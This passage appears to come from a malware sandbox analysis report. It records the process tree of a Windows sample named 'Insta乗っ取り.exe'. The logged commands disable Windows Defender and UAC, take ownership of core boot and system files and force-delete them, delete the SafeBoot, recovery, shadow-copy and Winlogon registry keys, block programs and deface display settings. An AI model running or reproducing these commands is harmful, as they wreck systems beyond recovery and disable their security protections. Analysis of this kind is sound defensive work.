  - Suspicious use of WriteProcessMemory
  PID:1692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c
    3⤵
    PID:856
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Stop-Process -Name \"explorer\" -Force"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "echo MsgBox "ぽんぽこウイルスに感染しちゃったよ(T_T)" ^& vbCrLf ^& "でも大丈夫！僕が直してあげる", vbCritical, "元気出して！！" > %temp%\message.vbs && cscript //nologo %temp%\message.vbs && del %temp%\message.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3984
  - - C:\Windows\system32\cscript.exe
      cscript //nologo C:\Users\Admin\AppData\Local\Temp\message.vbs
      4⤵
      PID:1392
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:2944
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
    3⤵
    PID:4620
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
    3⤵
    PID:4820
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
    3⤵
    PID:4476
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
    3⤵
    PID:996
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableEmailScanning /t REG_DWORD /d 1 /f
    3⤵
    PID:3168
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ThreatsReportDisabled /t REG_DWORD /d 1 /f
    3⤵
    PID:3820
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
    3⤵
    PID:4416
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DenyEnhancedNotifications /t REG_DWORD /d 1 /f
    3⤵
    PID:5108
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f
    3⤵
    PID:420
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableIntrusionPreventionSystem /t REG_DWORD /d 1 /f
    3⤵
    PID:1972
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
    3⤵
    PID:1144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\winload.exe" /a"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1304
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\winload.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\Boot\winload.exe" /a"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1044
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\Boot\winload.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\hal.dll" /a"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3760
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\hal.dll" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\BOOTVID.DLL" /a"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3156
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\BOOTVID.DLL" /a
      4⤵
      Possible privilege escalation attempt
      Suspicious use of AdjustPrivilegeToken
      PID:1096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\Boot\winresume.exe" /a"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2164
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\Boot\winresume.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\winload.efi" /a"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1344
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\winload.efi" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\Boot\winload.efi" /a"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3716
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\Boot\winload.efi" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\Boot\winresume.efi" /a"
    3⤵
    PID:1112
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\Boot\winresume.efi" /a
      4⤵
      Possible privilege escalation attempt
      Suspicious use of AdjustPrivilegeToken
      PID:1416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\bootsect.exe" /a"
    3⤵
    PID:2984
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\bootsect.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\bootim.exe" /a"
    3⤵
    PID:4068
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\bootim.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\bootux.dl" /a"
    3⤵
    PID:2360
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\bootux.dl" /a
      4⤵
      Possible privilege escalation attempt
      Suspicious use of AdjustPrivilegeToken
      PID:2392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\kernel32.dll" /a"
    3⤵
    PID:3868
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\kernel32.dll" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\user32.dll" /a"
    3⤵
    PID:2148
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\user32.dll" /a
      4⤵
      Possible privilege escalation attempt
      Suspicious use of AdjustPrivilegeToken
      PID:2112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\win32k.sys" /a"
    3⤵
    PID:1780
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\win32k.sys" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\winload.exe" /grant administrators:F"
    3⤵
    PID:836
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\winload.exe" /grant administrators:F
      4⤵
      PID:636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\Boot\winload.exe" /grant administrators:F"
    3⤵
    PID:2452
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\Boot\winload.exe" /grant administrators:F
      4⤵
      PID:1384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\hal.dll" /grant administrators:F"
    3⤵
    PID:2936
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\hal.dll" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      PID:4264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\BOOTVID.DLL" /grant administrators:F"
    3⤵
    PID:2168
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\BOOTVID.DLL" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      PID:1508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\Boot\winresume.exe" /grant administrators:F"
    3⤵
    PID:3372
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\Boot\winresume.exe" /grant administrators:F
      4⤵
      PID:2708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\winload.efi" /grant administrators:F"
    3⤵
    PID:2220
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\winload.efi" /grant administrators:F
      4⤵
      PID:5004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\Boot\winload.efi" /grant administrators:F"
    3⤵
    PID:2856
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\Boot\winload.efi" /grant administrators:F
      4⤵
      Modifies file permissions
      PID:3968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\Boot\winresume.efi" /grant administrators:F"
    3⤵
    PID:724
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\Boot\winresume.efi" /grant administrators:F
      4⤵
      PID:4876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\bootsect.exe" /grant administrators:F"
    3⤵
    PID:4588
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\bootsect.exe" /grant administrators:F
      4⤵
      PID:244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\bootim.exe" /grant administrators:F"
    3⤵
    PID:3604
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\bootim.exe" /grant administrators:F
      4⤵
      PID:3676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\bootux.dl" /grant administrators:F"
    3⤵
    PID:4248
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\bootux.dl" /grant administrators:F
      4⤵
      Modifies file permissions
      PID:3404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\kernel32.dll" /grant administrators:F"
    3⤵
    PID:3532
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\kernel32.dll" /grant administrators:F
      4⤵
      PID:3844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\user32.dll" /grant administrators:F"
    3⤵
    PID:3776
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\user32.dll" /grant administrators:F
      4⤵
      PID:1472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\win32k.sys" /grant administrators:F"
    3⤵
    PID:2200
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\win32k.sys" /grant administrators:F
      4⤵
      PID:2816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f"
    3⤵
    PID:3096
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      PID:4988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableFileSystemProtection" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4508
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableFileSystemProtection" /t REG_DWORD /d 1 /f
      4⤵
      PID:240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q C:\Windows\System32\winload.exe"
    3⤵
    PID:4468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q C:\Windows\System32\Boot\winload.exe"
    3⤵
    PID:4380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q C:\Windows\System32\hal.dll"
    3⤵
    PID:4296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q C:\Windows\System32\BOOTVID.DLL"
    3⤵
    PID:4800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q C:\Windows\System32\Boot\winresume.exe"
    3⤵
    PID:4716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q C:\Windows\System32\winload.efi"
    3⤵
    PID:1184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q C:\Windows\System32\Boot\winload.efi"
    3⤵
    PID:3784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q C:\Windows\System32\Boot\winresume.efi"
    3⤵
    PID:772
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q C:\Windows\System32\bootsect.exe"
    3⤵
    PID:3552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q C:\Windows\System32\bootim.exe"
    3⤵
    PID:4952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q C:\Windows\System32\bootux.dl"
    3⤵
    PID:2128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q C:\Windows\System32\kernel32.dll"
    3⤵
    PID:3516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q C:\Windows\System32\user32.dll"
    3⤵
    PID:1036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q C:\Windows\System32\win32k.sys"
    3⤵
    PID:2768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"
    3⤵
    PID:1488
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      PID:2112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 0 /f"
    3⤵
    PID:2848
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 0 /f
      4⤵
      PID:1580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg del HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MiniDumper /f"
    3⤵
    PID:3936
  - - C:\Windows\system32\reg.exe
      reg del HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MiniDumper /f
      4⤵
      PID:1392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg del HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot /f"
    3⤵
    PID:1872
  - - C:\Windows\system32\reg.exe
      reg del HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot /f
      4⤵
      PID:5080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg del HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Recovery /f"
    3⤵
    PID:4776
  - - C:\Windows\system32\reg.exe
      reg del HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Recovery /f
      4⤵
      PID:2144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg del HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VolSnap /f"
    3⤵
    PID:1348
  - - C:\Windows\system32\reg.exe
      reg del HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VolSnap /f
      4⤵
      PID:4820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg del HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS /f"
    3⤵
    PID:3588
  - - C:\Windows\system32\reg.exe
      reg del HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS /f
      4⤵
      PID:3788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg del HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemRestore /f"
    3⤵
    PID:3008
  - - C:\Windows\system32\reg.exe
      reg del HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemRestore /f
      4⤵
      PID:5092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg del HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /f"
    3⤵
    PID:5064
  - - C:\Windows\system32\reg.exe
      reg del HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /f
      4⤵
      PID:1588
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Colors" /v Window /t REG_SZ /d "0 0 0" /f
    3⤵
    PID:2500
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Colors" /v WindowText /t REG_SZ /d "255 0 0" /f
    3⤵
    PID:3604
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Colors" /v ButtonFace /t REG_SZ /d "255 0 0" /f
    3⤵
    PID:2764
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Colors" /v ButtonText /t REG_SZ /d "0 0 0" /f
    3⤵
    PID:2504
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Colors" /v ActiveTitle /t REG_SZ /d "255 0 0" /f
    3⤵
    PID:6068
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Colors" /v InactiveTitle /t REG_SZ /d "128 0 0" /f
    3⤵
    PID:7360
- - C:\Windows\SYSTEM32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Themes\HighContrast /v 1 /t REG_DWORD /d 1 /f
    3⤵
    PID:4200
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d 10 /f
    3⤵
    PID:2064
- - C:\Windows\SYSTEM32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Display /v RotationAngle /t REG_DWORD /d 180 /f
    3⤵
    PID:6732
- - C:\Windows\SYSTEM32\reg.exe
    reg add HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\SystemExit /v "" /t REG_SZ /d "C:\Windows\Media\Windows User Account Control.wav" /f
    3⤵
    PID:1348
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v IconSpacing /t REG_SZ /d -100 /f
    3⤵
    PID:2476
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v IconVerticalSpacing /t REG_SZ /d -100 /f
    3⤵
    PID:132
- - C:\Windows\SYSTEM32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v TaskbarSmallIcons /t REG_DWORD /d 1 /f
    3⤵
    PID:2856
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Colors" /v ButtonHighlight /t REG_SZ /d "255 0 255" /f
    3⤵
    PID:6644
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Colors" /v ButtonShadow /t REG_SZ /d "0 255 255" /f
    3⤵
    PID:6580
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1600
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f
    3⤵
    - Event Triggered Execution: Screensaver
    PID:7436
- - C:\Windows\SYSTEM32\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 1 /f
    3⤵
    - Event Triggered Execution: Screensaver
    PID:7216
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3576

C:\Windows\System32\Insta乗っ取り.exe
C:\Windows\System32\Insta乗っ取り.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1792
- C:\Users\Admin\AppData\Local\Temp\onefile_1792_133770885342048312\Insta乗っ取り.exe
  C:\Windows\System32\Insta乗っ取り.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  PID:3880
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Stop-Process -Name \"explorer\" -Force"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4200
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:4056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4244
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:3004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4920
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      PID:896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4912
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:4300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:1628
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:5236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:3872
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:5296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:2044
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:2040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:3612
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:5308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4324
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:5404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:3548
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      PID:5484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4420
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:5496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:2428
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
      4⤵
      Blocks application from running via registry modification
      PID:4512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4280
  - - C:\Windows\system32\reg.exe
